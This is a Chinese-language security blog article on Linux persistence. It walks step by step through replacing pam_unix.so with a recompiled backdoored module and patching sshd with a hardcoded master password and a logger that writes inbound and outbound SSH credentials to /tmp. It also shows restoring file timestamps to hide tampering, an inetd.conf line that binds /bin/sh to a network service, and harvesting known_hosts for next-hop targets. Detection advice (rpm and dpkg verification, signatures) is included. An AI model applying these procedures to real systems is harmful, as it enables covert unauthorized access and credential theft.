1. 安全攻防观点

0x1：For the Attacker

• Use System Builtin's to Simulate Rootkit Functionality. Stop relying on tools: "Master the environment."：尽量做到润物细无声，即把rootkit伪装成系统正常的工具、行为

• Everything Is A Weapon：内力所到之处，皆为兵刃，对于操作系统的任何一个特性，只要找到正确的使用方法和组合模式，都极有可能形成一条入侵向量

0x2：For the Defender

• Know Your System, Before I Use it Against You. Thinking like an attacker: "Flip the evil bit."

• Know Your Enemy : Know Your System：客户端攻防的战场主要在操作系统层面，同时也包括了和系统衔接的WEB、远程LOGIN等模块，了解它们的特性(尤其是高性能、边缘特性)才能更好地作出针对性的防御

• Effectivness != Complexity：攻防是一个整体性的工程化项目，任何一个维度的漏洞都能够导致被黑客入侵，因此并一定说内核攻防就比应用层攻防重要，它们是同等重要的。攻防手段的有效性并不一定需要通过复杂性来保证

Relevant Link：

https://www.blacklodgeresearch.org/files/7613/6963/4840/Poor_Mans_Root_Kit_BLR_talk_PUBLIC_2013.pdf

2. SSH Pam后门

PAM(插入式验证模块(Pluggable Authentication Module，PAM))简单来说，就是提供了一组身份验证、密码验证的统一抽象接口，应用程序员可以使用这些API接口来实现与安全性相关的功能，PAM可以作为Linux登录验证(包括SSH)的统一验证入口点，也同样出于一点，黑客可以利用PAM部署SSH代码级的逻辑后门

0x1: 查询本机的PAM版本

aaarticlea/png;base64,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" alt="" />

0x2: 下载对应的源代码文件

http://pkgs.fedoraproject.org/repo/pkgs/pam/Linux-PAM-0.99.6.2.tar.bz2/52844c64efa6f8b6a9ed702eec341a4c/

http://www.linux-pam.org/pre/history/

http://www.linux-pam.org/pre/library/

0x3: 对原始的PAM so文件进行备份

cd /lib64/security

ll pam_unix.so

mv pam_unix.so pam_unix.so.bak

0x4: 修改源文件，添加逻辑后门

cd /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/modules/pam_unix

vim pam_unix_auth.c

aaarticlea/png;base64,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" alt="" />

0x5: 重新编译pam模块

cd /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/

./configure

make

0x6: 使用包含逻辑后门的pam模块替换系统默认的pam模块

cp /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/modules/pam_unix/.libs/pam_unix.so /lib64/security/pam_unix.so

0x7: 测试后门

. 使用正常root帐号、密码登录

. 使用root帐号，后门密码(pam)进行隐藏登录

0x8: 对抗检测方法

pam_unix是系统原生的模块，可以使用RPM的校验机制进行篡改检测

. centos rpm校验已安装包是否被修改

rpm -qV pam

....L....  c /etc/pam.d/fingerprint-auth

....L....  c /etc/pam.d/password-auth

....L....  c /etc/pam.d/smartcard-auth

....L....  c /etc/pam.d/system-auth

S.?......    /lib64/libpam.so.0.82.

S.?......    /lib64/libpam_misc.so.0.82.

S.....T.    /lib64/security/pam_unix.so

结果含义

/*

如果一切均校验正常将不会产生任何输出。如果有不一致的地方，就会显示出来。输出格式

1. 8位长字符串: 8位字符的每一个 用以表示文件与RPM数据库中一种属性的比较结果("."表示检测通过)

    1) S: 文件大小

    2) M: 模式e (包括权限和文件类型)

    3) 5: 校验和(md5)、?: 文件不可读

    4) D: 设备

    5) L: 符号链接

    6) U: 用户

    7) G: 组

    8) T: 文件修改时间

2. c: 用以指配置文件

3. 文件名

*/

. ubuntu

dpkg -V libpam-modules

???????? c /etc/security/limits.conf

????????   /lib/x86_64-linux-gnu/security/pam_unix.so

从二进制的角度来看，被植入了代码级逻辑后门的so文件可以被当成病毒处理，通过提取逻辑后门附近的二进制特征码，加入杀毒特征库，可以实现对此类后门的查杀，并禁止其被ssh加载

. 提取包含逻辑后门的pam_unix.so的特征码

. 加入杀毒特征库

. 禁止逻辑后门pam_unix.so模块被ssh进程加载

Relevant Link:

http://w ww.csdn123.com/html/itweb/20130911/112822_112821_112829.htm

http://www.cnblogs.com/LittleHann/p/3662161.html

http://bobao.360.cn/learning/detail/454.html

http://www.awaysoft.com/taor/rpm%E6%A0%A1%E9%AA%8C%E5%B7%B2%E5%AE%89%E8%A3%85%E5%8C%85%E6%98%AF%E5%90%A6%E8%A2%AB%E4%BF%AE%E6%94%B9.html

3. SSHD后门

0x1：查看SSH版本

ssh -V

OpenSSH_7.2p2 Ubuntu-4ubuntu2., OpenSSL 1.0.2g   Mar 

0x2：下载SSH源码包

下载并修改sshd源码

vi includes.h                   //修改后门密码，记录文件位置，

/*

+#define ILOG "/tmp/ilog"                      //记录登录到本机的用户名和密码

+#define OLOG "/tmp/olog"                   //记录本机登录到远程的用户名和密码

+#define SECRETPW "123456654321"    //后门的密码

*/

0x3：插入后门代码逻辑

• 使用设置的后门密码，直接跨越验证逻辑登录
• 记录root及其他帐号的登录记录，相当于key logger

0x4：还原sshd_config文件时间戳

touch -r sshd_config.bak ssh_config

0x5：重启服务或重新载入配置

service sshd reload

0x6：对抗检测方法

• 二进制特征检测
  • 通过ELF格式动态定位到目标函数的位置
  • 在目标函数内部采用clamav的特征库定位方式:【特征：offset：length】
• 使用系统rpm检测ssh的完整性
• 检测程序中的string特征字符串，黑客部署的逻辑后门代码一般都有一段字符串特征码
• 尝试任意密码登录ssh，检查是否被黑客部署了"无密码逻辑后门"，即黑客在判断逻辑中直接加入了return语句，跳过任何密码检查逻辑

Relevant Link:

http://www.freebuf.com/tools/10474.html

https://www.jianshu.com/p/b394528051c6

0x7：利用系统服务程序配置文件

修改：/etc/inetd.conf

daytime stream tcp nowait /bin/sh sh –I

用*程序替换in.telnetd、in.rexecd等 inted的服务程序重定向login程序。

4. $HOME/.ssh/known_hosts信息收集

“$HOME/.ssh/”目录下保存了本机的ssh登录记录，保存在“known_hosts”中，攻击者通过该文件可以直接获得DMZ/VPC或者常见下一跳IP。

